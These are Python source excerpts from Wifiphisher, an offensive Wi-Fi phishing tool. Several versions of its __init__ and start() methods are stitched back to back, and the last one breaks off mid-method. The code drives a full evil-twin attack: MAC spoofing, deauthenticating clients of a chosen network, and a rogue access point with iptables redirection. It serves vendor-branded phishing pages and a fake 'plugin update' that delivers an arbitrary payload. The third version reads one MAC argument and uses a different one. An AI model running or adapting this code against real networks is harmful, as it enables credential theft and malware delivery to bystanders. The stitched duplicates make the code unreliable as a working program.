 def __init__(self):
     """Create the collaborators this object drives.

     Construction order is kept as-is on purpose: each constructor may
     have its own side effects, and the ExtensionManager is handed the
     NetworkManager built just before it.  ``MAC_PREFIX_FILE`` is a
     module-level constant.
     """
     self.mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)
     network_manager = interfaces.NetworkManager()
     self.network_manager = network_manager
     self.template_manager = phishingpage.TemplateManager()
     self.access_point = accesspoint.AccessPoint()
     self.fw = firewall.Fw()
     # Shares the same NetworkManager instance stored on self above.
     self.em = extensions.ExtensionManager(network_manager)
 def __init__(self):
     """Create the collaborators this object drives and pick a log file name.

     Construction order is kept as-is on purpose, since each constructor
     may carry its own side effects.  ``MAC_PREFIX_FILE`` is a module-level
     constant; ``getFileName`` is a method defined elsewhere on the class.
     """
     self.mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)
     self.network_manager = interfaces.NetworkManager()
     self.template_manager = phishingpage.TemplateManager()
     self.access_point = accesspoint.AccessPoint()
     self.fw = firewall.Fw()
     # Attribute name is camelCase unlike the rest; kept because callers
     # read it by this name.
     log_file_name = self.getFileName()
     self.logFileName = log_file_name
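    def start(self):
        """Run the tool end to end and then hand control to the main TUI loop.

        Stages, in the order the code performs them: root check, channel
        range, argument parsing and logging setup, operation-mode setup,
        interface selection and MAC changes, firewall/forwarding setup,
        target AP selection (``--essid`` or the curses picker), template
        selection with optional payload copy, rogue AP + DHCP/DNS start,
        extension manager start, HTTP(S) server thread, main curses loop.

        Every failure path ends in ``self.stop()`` (``sys.exit`` for the
        root check).  Later statements assume ``self.stop()`` does not
        return: if it did, ``ap_iface``, ``mon_iface``, ``essid`` and
        ``channel`` would be unbound further down.  Reads and rebinds the
        module globals ``args`` and ``APs``.  ``self.opmode`` is expected to
        already exist on the instance.  The ``TODO`` below is still open, so
        the pre-existing iptables state is not saved before it is changed.
        """

        today = time.strftime("%Y-%m-%d %H:%M")
        print(
            '[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' %
            (VERSION, WEBSITE, today))

        # Show some emotions.
        if BIRTHDAY in today:
            print '[' + T + '*' + W + \
            '] Wifiphisher was first released on this day in 2015! ' \
            'Happy birthday!'
        if NEW_YEAR in today:
            print '[' + T + '*' + W + \
            '] Happy new year!'

        # First of - are you root?  Interface mode/MAC changes and the
        # iptables work below all need it.
        if os.geteuid():
            logger.error("Non root user detected")
            sys.exit('[' + R + '-' + W + '] Please run as root')

        # Set the channel range
        set_channel_range()

        # Parse args
        global args, APs
        args = parse_args()

        # setup the logging configuration
        setup_logging(args)

        if args.phishing_pages_directory:
            # check if the path ends with the proper separator, if not add it
            # this is to prevent problems when joining path with string concatenation
            if args.phishing_pages_directory[-1] != os.path.sep:
                args.phishing_pages_directory += os.path.sep
            phishing_pages_dir = args.phishing_pages_directory
            logger.info("Searching for scenario in %s" % phishing_pages_dir)

        if args.dnsmasq_conf:
            self.access_point.dns_conf_path = args.dnsmasq_conf

        if args.credential_log_path:
            phishinghttp.credential_log_path = args.credential_log_path

        # Initialize the operation mode manager
        self.opmode.initialize(args)
        # Set operation mode
        self.opmode.set_opmode(args, self.network_manager)

        self.network_manager.start()

        # TODO: We should have more checks here:
        # Is anything binded to our HTTP(S) ports?
        # Maybe we should save current iptables rules somewhere

        # get interfaces for monitor mode and AP mode and set the monitor interface
        # to monitor mode. shutdown on any errors
        try:
            if self.opmode.internet_sharing_enabled():
                self.network_manager.internet_access_enable = True
                if self.network_manager.is_interface_valid(
                        args.internetinterface, "internet"):
                    internet_interface = args.internetinterface
                    if interfaces.is_wireless_interface(internet_interface):
                        self.network_manager.unblock_interface(
                            internet_interface)
                logger.info("Selecting %s interface for accessing internet",
                            args.internetinterface)
            # check if the interface for WPS is valid
            if self.opmode.assoc_enabled():
                if self.network_manager.is_interface_valid(
                        args.wpspbc_assoc_interface, "WPS"):
                    logger.info("Selecting %s interface for WPS association",
                                args.wpspbc_assoc_interface)
            if self.opmode.extensions_enabled():
                # Both interfaces must be given explicitly to be honoured;
                # otherwise the pair is picked automatically.
                if args.extensionsinterface and args.apinterface:
                    if self.network_manager.is_interface_valid(
                            args.extensionsinterface, "monitor"):
                        mon_iface = args.extensionsinterface
                        self.network_manager.unblock_interface(mon_iface)
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    mon_iface, ap_iface = self.network_manager.get_interface_automatically(
                    )
                # display selected interfaces to the user
                logger.info(
                    "Selecting {} for deauthentication and {} for the rogue Access Point"
                    .format(mon_iface, ap_iface))
                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                    "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                    "rogue Access Point").format(G, W, mon_iface, ap_iface)

            if not self.opmode.extensions_enabled():
                # Single-interface mode: the AP interface doubles as the
                # monitor interface.
                if args.apinterface:
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    ap_iface = self.network_manager.get_interface(True, False)
                mon_iface = ap_iface

                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                    "rogue Access Point").format(G, W, ap_iface)
                logger.info(
                    "Selecting {} interface for rogue Access Point".format(
                        ap_iface))

            # Randomize MAC.  An invalid user-supplied MAC is reported but is
            # not fatal; the interface then keeps whatever address it had.
            if not args.no_mac_randomization:
                try:
                    new_mac = self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                    logger.info("Changing {} MAC address to {}".format(
                        ap_iface, new_mac))
                    print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                        G, W, ap_iface, new_mac)
                    if mon_iface != ap_iface:
                        new_mac = self.network_manager.set_interface_mac(
                            mon_iface, args.mac_extensions_interface)
                        logger.info("Changing {} MAC address to {}".format(
                            mon_iface, new_mac))
                        # Report the interface that was actually changed
                        # (mon_iface), matching the log line above.
                        print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                            G, W, mon_iface, new_mac)
                except interfaces.InvalidMacAddressError as err:
                    print("[{0}!{1}] {2}").format(R, W, err)

            # make sure interfaces are not blocked
            logger.info("Unblocking interfaces")
            self.network_manager.unblock_interface(ap_iface)
            self.network_manager.unblock_interface(mon_iface)
            # set monitor mode only when --essid is not given
            if self.opmode.extensions_enabled() or args.essid is None:
                self.network_manager.set_interface_mode(mon_iface, "monitor")
        except (interfaces.InvalidInterfaceError,
                interfaces.InterfaceCantBeFoundError,
                interfaces.InterfaceManagedByNetworkManagerError) as err:
            logging.exception("The following error has occurred:")
            print("[{0}!{1}] {2}").format(R, W, err)
            time.sleep(1)
            # Expected not to return; ap_iface/mon_iface may be unbound here.
            self.stop()

        # Only when no internet interface is used and the user did not ask
        # to keep NetworkManager alive.
        if not args.internetinterface and not args.keepnetworkmanager:
            kill_interfering_procs()
            logger.info("Killing all interfering processes")

        # Firewall: NAT through the internet interface when sharing, else
        # redirect everything to the local server.
        if self.opmode.internet_sharing_enabled():
            self.fw.nat(ap_iface, args.internetinterface)
            set_ip_fwd()
        else:
            self.fw.redirect_requests_localhost()
        set_route_localnet()

        print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
        time.sleep(1)

        if args.essid:
            essid = args.essid
            channel = str(CHANNEL)
            # We don't have target attacking MAC in frenzy mode
            # That is we deauth all the BSSIDs that being sniffed
            target_ap_mac = None
            enctype = None
        else:
            # let user choose access point
            # start the monitor adapter
            self.network_manager.up_interface(mon_iface)
            ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                           self.network_manager, args)
            ap_sel_object = tui.TuiApSel()
            access_point = curses.wrapper(ap_sel_object.gather_info,
                                          ap_info_object)
            # if the user has chosen a access point continue
            # otherwise shutdown
            if access_point:
                # store choosen access point's information
                essid = access_point.name
                channel = access_point.channel
                target_ap_mac = access_point.mac_address
                enctype = access_point.encryption
            else:
                # Expected not to return; essid/channel are unbound otherwise.
                self.stop()
        # create a template manager object
        self.template_manager = phishingpage.TemplateManager(
            data_pages=args.phishing_pages_directory)
        # get the correct template
        tui_template_obj = tui.TuiTemplateSelection()
        template = tui_template_obj.gather_info(args.phishingscenario,
                                                self.template_manager)
        logger.info("Selecting {} template".format(
            template.get_display_name()))
        print("[" + G + "+" + W + "] Selecting " +
              template.get_display_name() + " template")

        # payload selection for browser plugin update
        if template.has_payload():
            payload_path = args.payload_path
            # copy payload to update directory.  Only existence of the path
            # is checked; the file is copied verbatim into the template dir.
            while not payload_path or not os.path.isfile(payload_path):
                # get payload path
                payload_path = raw_input(
                    "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                    "] to the payload you wish to serve: ")
                if not os.path.isfile(payload_path):
                    print '[' + R + '-' + W + '] Invalid file path!'
            print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
            template.update_payload_path(os.path.basename(payload_path))
            copyfile(
                payload_path, self.template_manager.template_directory +
                template.get_payload_path())

        # One context entry per sniffed AP: APs is indexed by key and each
        # value is a (channel, essid, bssid, ...) sequence.
        APs_context = []
        for i in APs:
            APs_context.append({
                'channel':
                APs[i][0] or "",
                'essid':
                APs[i][1] or "",
                'bssid':
                APs[i][2] or "",
                'vendor':
                self.mac_matcher.get_vendor_name(APs[i][2]) or ""
            })

        template.merge_context({'APs': APs_context})

        # only get logo path if MAC address is present
        ap_logo_path = False
        if target_ap_mac is not None:
            ap_logo_path = template.use_file(
                self.mac_matcher.get_vendor_logo_path(target_ap_mac))

        template.merge_context({
            'target_ap_channel':
            channel or "",
            'target_ap_essid':
            args.phishing_essid or essid or "",
            'target_ap_bssid':
            target_ap_mac or "",
            'target_ap_encryption':
            enctype or "",
            'target_ap_vendor':
            self.mac_matcher.get_vendor_name(target_ap_mac) or "",
            'target_ap_logo_path':
            ap_logo_path or ""
        })
        # add wps_enable into the template context
        if args.wps_pbc:
            template.merge_context({'wps_pbc_attack': "1"})
        else:
            template.merge_context({'wps_pbc_attack': "0"})

        # We want to set this now for hostapd. Maybe the interface was in "monitor"
        # mode for network discovery before (e.g. when --noextensions is enabled).
        self.network_manager.set_interface_mode(ap_iface, "managed")
        # Start AP
        self.network_manager.up_interface(ap_iface)
        self.access_point.interface = ap_iface
        self.access_point.channel = channel
        self.access_point.essid = essid
        if args.force_hostapd:
            print(
                '[' + T + '*' + W + '] Using hostapd instead of roguehostapd.'
                " Many significant features will be turned off.")
            self.access_point.force_hostapd = True
        if args.wpspbc_assoc_interface:
            wps_mac = self.network_manager.get_interface_mac(
                args.wpspbc_assoc_interface)
            self.access_point.deny_mac_addrs.append(wps_mac)
        if args.presharedkey:
            self.access_point.presharedkey = args.presharedkey
        if self.opmode.internet_sharing_enabled():
            self.access_point.internet_interface = args.internetinterface
        print '[' + T + '*' + W + '] Starting the fake access point...'
        try:
            self.access_point.start(disable_karma=args.disable_karma)
            self.access_point.start_dhcp_dns()
        except BaseException:
            # BaseException is kept so that Ctrl-C here still tears down the
            # interface/iptables changes made above; log the cause first so
            # the failure is diagnosable.
            logger.exception("Failed to start the access point")
            self.stop()
        # Start Extension Manager (EM)
        # We need to start EM before we boot the web server
        if self.opmode.extensions_enabled():
            shared_data = {
                'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
                'target_ap_channel': channel or "",
                'target_ap_essid': essid or "",
                'target_ap_bssid': target_ap_mac or "",
                'target_ap_encryption': enctype or "",
                'target_ap_logo_path': ap_logo_path or "",
                'rogue_ap_essid': essid or "",
                'rogue_ap_mac':
                self.network_manager.get_interface_mac(ap_iface),
                'roguehostapd': self.access_point.hostapd_object,
                'APs': APs_context,
                'args': args
            }

            self.network_manager.up_interface(mon_iface)
            self.em.set_interface(mon_iface)
            # Copy so the per-run append/remove below never mutates the
            # module-level DEFAULT_EXTENSIONS list.
            extensions = list(DEFAULT_EXTENSIONS)
            if args.lure10_exploit:
                extensions.append(LURE10_EXTENSION)
            if args.handshake_capture:
                extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
            if args.nodeauth:
                extensions.remove(DEAUTH_EXTENSION)
            if args.wps_pbc:
                extensions.append(WPSPBC)
            if args.known_beacons:
                extensions.append(KNOWN_BEACONS_EXTENSION)
            if not args.force_hostapd:
                extensions.append(ROGUEHOSTAPDINFO)
            self.em.set_extensions(extensions)
            self.em.init_extensions(shared_data)
            self.em.start_extensions()
        # With configured DHCP, we may now start the web server
        if not self.opmode.internet_sharing_enabled():
            # Start HTTP server in a background thread
            print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
                PORT) + ", " + str(SSL_PORT)
            webserver = Thread(target=phishinghttp.runHTTPServer,
                               args=(NETWORK_GW_IP, PORT, SSL_PORT, template,
                                     self.em))
            webserver.daemon = True
            webserver.start()

            time.sleep(1.5)

        # We no longer need mac_matcher
        self.mac_matcher.unbind()

        # Rebinds the global (indexed as a mapping above) to an empty list.
        APs = []

        # Main loop.
        try:
            main_info = tui.MainInfo(VERSION, essid, channel, ap_iface,
                                     self.em, phishinghttp, args)
            tui_main_object = tui.TuiMain()
            curses.wrapper(tui_main_object.gather_info, main_info)
            self.stop()
        except KeyboardInterrupt:
            self.stop()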
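    def start(self):
        """Run the tool end to end and then drive the blessings status screen.

        Stages, in the order the code performs them: argument parsing and
        checking, root check, interface selection and MAC changes, killing
        interfering processes, firewall/forwarding setup, target AP selection
        (``--essid`` or the curses picker), template selection with optional
        payload copy, rogue AP + DHCP/DNS start, HTTP(S) server thread,
        extension manager start, then the refresh loop until Ctrl-C (or
        ``--quitonsuccess`` once ``phishinghttp.terminate`` is set).

        Every failure path ends in ``self.stop()`` (``sys.exit`` for the
        root check).  Later statements assume ``self.stop()`` does not
        return: if it did, ``ap_iface``, ``mon_iface``, ``essid`` and
        ``channel`` would be unbound further down.  Reads and rebinds the
        module globals ``args`` and ``APs``.  The ``TODO`` below is still
        open, so the pre-existing iptables state is not saved before it is
        changed.
        """
        # Parse args
        global args, APs
        args = parse_args()

        # Check args
        check_args(args)

        # Are you root?  Interface mode/MAC changes and the iptables work
        # below all need it.
        if os.geteuid():
            sys.exit('[' + R + '-' + W + '] Please run as root')

        self.network_manager.start()

        # TODO: We should have more checks here:
        # Is anything binded to our HTTP(S) ports?
        # Maybe we should save current iptables rules somewhere

        # get interfaces for monitor mode and AP mode and set the monitor interface
        # to monitor mode. shutdown on any errors
        try:
            if args.internetinterface:
                if self.network_manager.is_interface_valid(
                        args.internetinterface, "internet"):
                    internet_interface = args.internetinterface
                    self.network_manager.unblock_interface(internet_interface)
            if not args.nojamming:
                # Both interfaces must be given explicitly to be honoured;
                # otherwise the pair is picked automatically.
                if args.jamminginterface and args.apinterface:
                    if self.network_manager.is_interface_valid(
                            args.jamminginterface, "monitor"):
                        mon_iface = args.jamminginterface
                        self.network_manager.unblock_interface(mon_iface)
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    mon_iface, ap_iface = self.network_manager.get_interface_automatically(
                    )
                # display selected interfaces to the user
                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                    "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                    "rogue Access Point").format(G, W, mon_iface, ap_iface)

                # randomize the mac addresses, unless explicit ones were given
                if not args.no_mac_randomization:
                    if args.mac_ap_interface:
                        self.network_manager.set_interface_mac(
                            ap_iface, args.mac_ap_interface)
                    else:
                        self.network_manager.set_interface_mac_random(ap_iface)
                    if args.mac_deauth_interface:
                        self.network_manager.set_interface_mac(
                            mon_iface, args.mac_deauth_interface)
                    else:
                        self.network_manager.set_interface_mac_random(
                            mon_iface)
            else:
                # Single-interface mode: the AP interface doubles as the
                # monitor interface.
                if args.apinterface:
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    ap_iface = self.network_manager.get_interface(True, False)
                mon_iface = ap_iface

                # Set the MAC exactly once here, honouring --mac-ap-interface;
                # a second unconditional randomization after the print below
                # used to discard the user-supplied address.
                if not args.no_mac_randomization:
                    if args.mac_ap_interface:
                        self.network_manager.set_interface_mac(
                            ap_iface, args.mac_ap_interface)
                    else:
                        self.network_manager.set_interface_mac_random(ap_iface)

                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                    "rogue Access Point").format(G, W, ap_iface)

            # make sure interfaces are not blocked
            self.network_manager.unblock_interface(ap_iface)
            self.network_manager.unblock_interface(mon_iface)

            if not args.internetinterface:
                kill_interfering_procs()

            self.network_manager.set_interface_mode(mon_iface, "monitor")
        except (interfaces.InvalidInterfaceError,
                interfaces.InterfaceCantBeFoundError,
                interfaces.InterfaceManagedByNetworkManagerError) as err:
            print("[{0}!{1}] {2}").format(R, W, err)

            time.sleep(1)
            # Expected not to return; ap_iface/mon_iface may be unbound here.
            self.stop()

        # Report the addresses actually in effect (read back from the
        # interfaces rather than from the arguments).
        if not args.no_mac_randomization:
            ap_mac = self.network_manager.get_interface_mac(ap_iface)
            print "[{0}+{1}] {2} mac address is now {3} ".format(
                G, W, ap_iface, ap_mac)

            if not args.nojamming:
                mon_mac = self.network_manager.get_interface_mac(mon_iface)
                print("[{0}+{1}] {2} mac address becomes {3}".format(
                    G, W, mon_iface, mon_mac))

        # Firewall: NAT through the internet interface when given, else
        # redirect everything to the local server.
        if args.internetinterface:
            self.fw.nat(ap_iface, args.internetinterface)
            set_ip_fwd()
        else:
            self.fw.redirect_requests_localhost()
        set_route_localnet()

        print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
        time.sleep(1)

        # From here on ap_mac holds the *target* AP's BSSID (or None), not the
        # rogue interface address read above.
        if args.essid:
            essid = args.essid
            channel = str(CHANNEL)
            ap_mac = None
            enctype = None
        else:
            # let user choose access point
            access_point = curses.wrapper(select_access_point, mon_iface,
                                          self.mac_matcher,
                                          self.network_manager)

            # if the user has chosen a access point continue
            # otherwise shutdown
            if access_point:
                # store choosen access point's information
                essid = access_point.get_name()
                channel = access_point.get_channel()
                ap_mac = access_point.get_mac_address()
                enctype = access_point.get_encryption()
            else:
                # Expected not to return; essid/channel are unbound otherwise.
                self.stop()
        # create a template manager object
        self.template_manager = phishingpage.TemplateManager()
        # get the correct template
        template = select_template(args.phishingscenario,
                                   self.template_manager)

        print("[" + G + "+" + W + "] Selecting " +
              template.get_display_name() + " template")

        # payload selection for browser plugin update
        if template.has_payload():
            payload_path = False
            # copy payload to update directory.  Only existence of the path
            # is checked; the file is copied verbatim into the pages dir.
            while not payload_path or not os.path.isfile(payload_path):
                # get payload path
                payload_path = raw_input(
                    "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                    "] to the payload you wish to serve: ")
                if not os.path.isfile(payload_path):
                    print '[' + R + '-' + W + '] Invalid file path!'
            print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
            copyfile(payload_path,
                     PHISHING_PAGES_DIR + template.get_payload_path())

        # One context entry per sniffed AP: APs is indexed by key and each
        # value is a (channel, essid, bssid, ...) sequence.
        APs_context = []
        for i in APs:
            APs_context.append({
                'channel':
                APs[i][0] or "",
                'essid':
                APs[i][1] or "",
                'bssid':
                APs[i][2] or "",
                'vendor':
                self.mac_matcher.get_vendor_name(APs[i][2]) or ""
            })

        template.merge_context({'APs': APs_context})

        # only get logo path if MAC address is present
        ap_logo_path = False
        if ap_mac:
            ap_logo_path = template.use_file(
                self.mac_matcher.get_vendor_logo_path(ap_mac))

        template.merge_context({
            'target_ap_channel':
            channel or "",
            'target_ap_essid':
            essid or "",
            'target_ap_bssid':
            ap_mac or "",
            'target_ap_encryption':
            enctype or "",
            'target_ap_vendor':
            self.mac_matcher.get_vendor_name(ap_mac) or "",
            'target_ap_logo_path':
            ap_logo_path or ""
        })

        # We want to set this now for hostapd. Maybe the interface was in "monitor"
        # mode for network discovery before (e.g. when --nojamming is enabled).
        self.network_manager.set_interface_mode(ap_iface, "managed")
        # Start AP
        self.access_point.set_interface(ap_iface)
        self.access_point.set_channel(channel)
        self.access_point.set_essid(essid)
        if args.presharedkey:
            self.access_point.set_psk(args.presharedkey)
        if args.internetinterface:
            self.access_point.set_internet_interface(args.internetinterface)
        print '[' + T + '*' + W + '] Starting the fake access point...'
        try:
            self.access_point.start()
            self.access_point.start_dhcp_dns()
        except BaseException:
            # BaseException is kept so that Ctrl-C here still tears down the
            # interface/iptables changes made above.  The cause is not
            # logged, so a failed AP start is hard to diagnose.
            self.stop()

        # With configured DHCP, we may now start the web server
        if not args.internetinterface:
            # Start HTTP server in a background thread
            print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
                PORT) + ", " + str(SSL_PORT)
            webserver = Thread(target=phishinghttp.runHTTPServer,
                               args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
            webserver.daemon = True
            webserver.start()

            time.sleep(1.5)

        # We no longer need mac_matcher
        self.mac_matcher.unbind()

        # Rebinds the global (indexed as a mapping above) to an empty list.
        APs = []

        if not args.nojamming:
            # Start Extension Manager
            shared_data = {
                'target_ap_channel': channel or "",
                'target_ap_essid': essid or "",
                'target_ap_bssid': ap_mac or "",
                'target_ap_encryption': enctype or "",
                'target_ap_logo_path': ap_logo_path or "",
                # NOTE(review): ap_mac is the target BSSID at this point (and
                # None with --essid), so 'rogue_ap_mac' does not carry the
                # rogue interface's address; left unchanged, verify against
                # the extensions that consume it.
                'rogue_ap_mac': ap_mac,
                'APs': APs_context,
                'args': args
            }
            self.em.set_interface(mon_iface)
            # Copy so the per-run append below never mutates the module-level
            # DEFAULT_EXTENSIONS list.
            extensions = list(DEFAULT_EXTENSIONS)

            if args.lure10_exploit:
                extensions.append(LURE10_EXTENSION)
            self.em.set_extensions(extensions)
            self.em.init_extensions(shared_data)
            self.em.start_extensions()

        # Main loop.  Redraws the status panel each pass; exits on Ctrl-C or,
        # with --quitonsuccess, once the web server sets phishinghttp.terminate.
        try:
            term = Terminal()
            with term.fullscreen():
                while True:
                    term.clear()
                    with term.hidden_cursor():
                        print term.move(0, term.width - 30) + "|"
                        print term.move(
                            1, term.width -
                            30) + "|" + " " + term.bold_blue("Wifiphisher " +
                                                             VERSION)
                        print term.move(
                            2, term.width - 30) + "|" + " ESSID: " + essid
                        print term.move(
                            3, term.width - 30) + "|" + " Channel: " + channel
                        print term.move(
                            4, term.width -
                            30) + "|" + " AP interface: " + ap_iface
                        print term.move(5, term.width - 30) + "|" + "_" * 29
                        print term.move(
                            1, 0) + term.blue("Deauthenticating clients: ")
                        if not args.nojamming:
                            # show the 5 most recent entries
                            for line in self.em.get_output()[-5:]:
                                print line
                        print term.move(7, 0) + term.blue("DHCP Leases: ")
                        if os.path.isfile('/var/lib/misc/dnsmasq.leases'):
                            proc = check_output(
                                ['tail', '-5', '/var/lib/misc/dnsmasq.leases'])
                            print term.move(8, 0) + proc
                        print term.move(14, 0) + term.blue("HTTP requests: ")
                        # NOTE(review): fixed path under /tmp is shared with
                        # every local user; only read here, but the writer
                        # should prefer a per-run temporary file.
                        if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
                            proc = check_output([
                                'tail', '-5', '/tmp/wifiphisher-webserver.tmp'
                            ])
                            print term.move(15, 0) + proc
                        if phishinghttp.terminate and args.quitonsuccess:
                            raise KeyboardInterrupt
        except KeyboardInterrupt:
            self.stop()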
    def start(self):

        # Parse args
        global args, APs
        args = parse_args()

        # setup the logging configuration
        setup_logging(args)

        # Initialize the operation mode manager
        self.opmode.initialize(args)
        # Set operation mode
        self.opmode.set_opmode(args, self.network_manager)

        # Are you root?
        if os.geteuid():
            logger.error("Non root user detected")
            sys.exit('[' + R + '-' + W + '] Please run as root')

        self.network_manager.start()

        # TODO: We should have more checks here:
        # Is anything binded to our HTTP(S) ports?
        # Maybe we should save current iptables rules somewhere

        # get interfaces for monitor mode and AP mode and set the monitor interface
        # to monitor mode. shutdown on any errors
        try:
            if self.opmode.internet_sharing_enabled():
                self.network_manager.internet_access_enable = True
                if self.network_manager.is_interface_valid(
                        args.internetinterface, "internet"):
                    internet_interface = args.internetinterface
                    if interfaces.is_wireless_interface(internet_interface):
                        self.network_manager.unblock_interface(
                            internet_interface)
                logger.info("Selecting %s interface for accessing internet",
                            args.internetinterface)
            # check if the interface for WPS is valid
            if self.opmode.assoc_enabled():
                if self.network_manager.is_interface_valid(
                        args.wpspbc_assoc_interface, "WPS"):
                    logger.info("Selecting %s interface for WPS association",
                                args.wpspbc_assoc_interface)
            if self.opmode.extensions_enabled():
                if args.extensionsinterface and args.apinterface:
                    if self.network_manager.is_interface_valid(
                            args.extensionsinterface, "monitor"):
                        mon_iface = args.extensionsinterface
                        self.network_manager.unblock_interface(mon_iface)
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    mon_iface, ap_iface = self.network_manager.get_interface_automatically(
                    )
                # display selected interfaces to the user
                logger.info(
                    "Selecting {} for deauthentication and {} for the rogue Access Point"
                    .format(mon_iface, ap_iface))
                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                    "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                    "rogue Access Point").format(G, W, mon_iface, ap_iface)

                # randomize the mac addresses
                if not args.no_mac_randomization:
                    if args.mac_ap_interface:
                        self.network_manager.set_interface_mac(
                            ap_iface, args.mac_ap_interface)
                    else:
                        self.network_manager.set_interface_mac_random(ap_iface)
                    if args.mac_extensions_interface:
                        self.network_manager.set_interface_mac(
                            mon_iface, args.mac_deauth_interface)
                    else:
                        self.network_manager.set_interface_mac_random(
                            mon_iface)
            if not self.opmode.extensions_enabled():
                if args.apinterface:
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    ap_iface = self.network_manager.get_interface(True, False)
                mon_iface = ap_iface

                if not args.no_mac_randomization:
                    if args.mac_ap_interface:
                        self.network_manager.set_interface_mac(
                            ap_iface, args.mac_ap_interface)
                    else:
                        self.network_manager.set_interface_mac_random(ap_iface)

                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                    "rogue Access Point").format(G, W, ap_iface)
                logger.info(
                    "Selecting {} interface for rouge access point".format(
                        ap_iface))
                # randomize the mac addresses
                if not args.no_mac_randomization:
                    self.network_manager.set_interface_mac_random(ap_iface)

            # make sure interfaces are not blocked
            logger.info("Unblocking interfaces")
            self.network_manager.unblock_interface(ap_iface)
            self.network_manager.unblock_interface(mon_iface)
            # set monitor mode only when --essid is not given
            if self.opmode.extensions_enabled() or args.essid is None:
                self.network_manager.set_interface_mode(mon_iface, "monitor")
        except (interfaces.InvalidInterfaceError,
                interfaces.InterfaceCantBeFoundError,
                interfaces.InterfaceManagedByNetworkManagerError) as err:
            logger.exception("The following error has occurred:")
            print("[{0}!{1}] {2}").format(R, W, err)

            time.sleep(1)
            self.stop()

        if not args.internetinterface:
            kill_interfering_procs()
            logger.info("Killing all interfering processes")

        rogue_ap_mac = self.network_manager.get_interface_mac(ap_iface)
        if not args.no_mac_randomization:
            logger.info("Changing {} MAC address to {}".format(
                ap_iface, rogue_ap_mac))
            print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                G, W, ap_iface, rogue_ap_mac)

            if self.opmode.extensions_enabled():
                mon_mac = self.network_manager.get_interface_mac(mon_iface)
                logger.info("Changing {} MAC address to {}".format(
                    mon_iface, mon_mac))
                print("[{0}+{1}] Changing {2} MAC addr to {3}".format(
                    G, W, mon_iface, mon_mac))

        if self.opmode.internet_sharing_enabled():
            self.fw.nat(ap_iface, args.internetinterface)
            set_ip_fwd()
        else:
            self.fw.redirect_requests_localhost()
        set_route_localnet()

        print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
        time.sleep(1)

        if args.essid:
            essid = args.essid
            channel = str(CHANNEL)
            # We don't have target attacking MAC in frenzy mode
            # That is we deauth all the BSSIDs that being sniffed
            target_ap_mac = None
            enctype = None
        else:
            # let user choose access point
            # start the monitor adapter
            self.network_manager.up_interface(mon_iface)
            ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                           self.network_manager, args)
            ap_sel_object = tui.TuiApSel()
            access_point = curses.wrapper(ap_sel_object.gather_info,
                                          ap_info_object)
            # if the user has chosen a access point continue
            # otherwise shutdown
            if access_point:
                # store choosen access point's information
                essid = access_point.get_name()
                channel = access_point.get_channel()
                target_ap_mac = access_point.get_mac_address()
                enctype = access_point.get_encryption()
            else:
                self.stop()
        # create a template manager object
        self.template_manager = phishingpage.TemplateManager()
        # get the correct template
        tui_template_obj = tui.TuiTemplateSelection()
        template = tui_template_obj.gather_info(args.phishingscenario,
                                                self.template_manager)
        logger.info("Selecting {} template".format(
            template.get_display_name()))
        print("[" + G + "+" + W + "] Selecting " +
              template.get_display_name() + " template")

        # payload selection for browser plugin update
        if template.has_payload():
            payload_path = args.payload_path
            # copy payload to update directory
            while not payload_path or not os.path.isfile(payload_path):
                # get payload path
                payload_path = raw_input(
                    "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                    "] to the payload you wish to serve: ")
                if not os.path.isfile(payload_path):
                    print '[' + R + '-' + W + '] Invalid file path!'
            print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
            template.update_payload_path(os.path.basename(payload_path))
            copyfile(payload_path,
                     PHISHING_PAGES_DIR + template.get_payload_path())

        APs_context = []
        for i in APs:
            APs_context.append({
                'channel':
                APs[i][0] or "",
                'essid':
                APs[i][1] or "",
                'bssid':
                APs[i][2] or "",
                'vendor':
                self.mac_matcher.get_vendor_name(APs[i][2]) or ""
            })

        template.merge_context({'APs': APs_context})

        # only get logo path if MAC address is present
        ap_logo_path = False
